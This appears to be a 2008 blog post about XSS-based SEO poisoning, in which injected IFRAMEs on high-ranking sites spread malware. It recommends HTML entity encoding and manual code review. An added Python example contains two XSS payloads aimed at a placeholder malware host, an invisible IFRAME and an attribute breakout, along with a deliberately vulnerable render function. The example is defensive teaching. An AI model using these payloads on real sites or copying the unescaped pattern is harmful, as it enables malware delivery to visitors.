XSS SEO poisoning attacks on the rise. How to protect against them?

Written by DP

Monday, 31 March 2008

In order to have a better understanding about this subject matter, I suggest that you read Dancho Danchev's blog post:

Massive IFRAME SEO Poisoning Attack Continuing

Another good post by RSnake:

XSS, Redirects and SEO

Attackers spread malware by exploiting XSS vulnerabilities on high-profile websites. More specifically, they craft links that inject an IFRAME into the vulnerable page, and that IFRAME loads malicious content from servers at various IP addresses around the globe. Because these high-PageRank sites are so well optimised for search engines, the crafted links get indexed, and large numbers of web users who search for a popular keyword unwittingly click the trap links in the SERPs and end up infected with malware, adware and spyware.

One countermeasure that prevents this class of issue from recurring is to convert all applicable characters in untrusted input to HTML entities before that input is written into the page source:
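The following is an added example, not code from the original post: it models a search page that reflects its q parameter, shows the IFRAME injection from a poisoned link, and contrasts it with output encoding via Python's standard html.escape. The hostnames, payloads and the search-page markup are constructed placeholders. It also goes slightly beyond the text by showing why "all applicable characters" must include the quote characters: a payload that breaks out of a quoted attribute needs no angle brackets at all.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# Constructed sample of the attack described above. The hostnames are
# hypothetical placeholders, not infrastructure from the original post.
IFRAME_PAYLOAD = (
    '<iframe src="http://malware.example/load" width="0" height="0"></iframe>'
)
POISONED_URL = "http://bigsite.example/search?q=" + quote(IFRAME_PAYLOAD)

# Second constructed payload: breaks out of a quoted attribute without
# using < or >, so encoding only the angle brackets does not stop it.
ATTR_PAYLOAD = '" autofocus onfocus="location=\'http://malware.example/\''


def query_from_url(url: str) -> str:
    """Extract the q parameter exactly as the search page would see it."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


def render_vulnerable(query: str) -> str:
    """Echoes the search term straight into the page (the bug)."""
    return f'<h1>Results for: {query}</h1>\n<input name="q" value="{query}">'


def render_hardened(query: str) -> str:
    """Converts &, <, >, " and ' to entities before the term reaches the page.
    quote=True is what makes this safe inside the quoted attribute as well."""
    safe = html.escape(query, quote=True)
    return f'<h1>Results for: {safe}</h1>\n<input name="q" value="{safe}">'


def render_half_hardened(query: str) -> str:
    """Encodes only &, < and >: enough for the text node in the <h1>,
    not enough for the quoted value attribute of the <input>."""
    safe = html.escape(query, quote=False)
    return f'<h1>Results for: {safe}</h1>\n<input name="q" value="{safe}">'


def has_injected_iframe(page: str) -> bool:
    """Crude check: an IFRAME start tag the browser would actually parse."""
    return "<iframe" in page.lower()


def has_attribute_breakout(page: str) -> bool:
    """Crude check: the injected event handler became a real attribute."""
    return ' onfocus="' in page


if __name__ == "__main__":
    q = query_from_url(POISONED_URL)
    print("iframe, vulnerable:", has_injected_iframe(render_vulnerable(q)))
    print("iframe, hardened:  ", has_injected_iframe(render_hardened(q)))
    print("attr, half:        ", has_attribute_breakout(render_half_hardened(ATTR_PAYLOAD)))
    print("attr, hardened:    ", has_attribute_breakout(render_hardened(ATTR_PAYLOAD)))
```

Encode at the point of output, for the context the data lands in: the same term may need entity encoding in an element body and in an attribute value, and the attribute case is only safe when quotes are encoded too.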

Reviewing the code by hand is better than relying on automated review software. It is a time-consuming but rewarding process that should be done carefully and with attention to every last detail. A major benefit is keeping your visitors' trust, and even attracting more visitors, by showing that you protect their privacy and security. You show this by not ending up in the media spotlight over vulnerabilities in your website. Nor do you want to knowingly harbour them, because your business and reputation will be at great risk. Putting up a "Hacker Safe" badge won't do any good either.

Some Rights Reserved.